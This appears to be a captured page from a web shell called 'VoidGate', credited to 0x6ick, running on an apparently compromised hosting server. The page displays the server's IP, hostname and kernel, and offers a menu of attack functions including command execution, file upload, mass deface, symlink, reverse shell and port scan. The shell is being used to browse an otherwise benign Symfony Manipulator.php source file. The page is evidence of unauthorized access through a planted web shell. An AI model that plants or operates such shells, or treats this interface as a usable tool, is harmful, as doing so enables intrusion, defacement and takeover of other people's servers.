ヤミRoot VoidGate
User / IP
:
216.73.216.137
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
vendor
/
sensio
/
generator-bundle
/
Manipulator
/
Viewing: Manipulator.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Sensio\Bundle\GeneratorBundle\Manipulator; /** * Changes the PHP code of a Kernel. * * @author Fabien Potencier <fabien@symfony.com> */ class Manipulator { protected $tokens; protected $line; /** * Sets the code to manipulate. * * @param array $tokens An array of PHP tokens * @param int $line The start line of the code */ protected function setCode(array $tokens, $line = 0) { $this->tokens = $tokens; $this->line = $line; } /** * Gets the next token. * * @return string|null */ protected function next() { while ($token = array_shift($this->tokens)) { $this->line += substr_count($this->value($token), "\n"); if (is_array($token) && in_array($token[0], array(T_WHITESPACE, T_COMMENT, T_DOC_COMMENT))) { continue; } return $token; } } /** * Peeks the next token. * * @param int $nb * * @return string|null */ protected function peek($nb = 1) { $i = 0; $tokens = $this->tokens; while ($token = array_shift($tokens)) { if (is_array($token) && in_array($token[0], array(T_WHITESPACE, T_COMMENT, T_DOC_COMMENT))) { continue; } ++$i; if ($i == $nb) { return $token; } } } /** * Gets the value of a token. * * @param string|string[] $token The token value * * @return string */ protected function value($token) { return is_array($token) ? $token[1] : $token; } }
Coded With 💗 by
0x6ick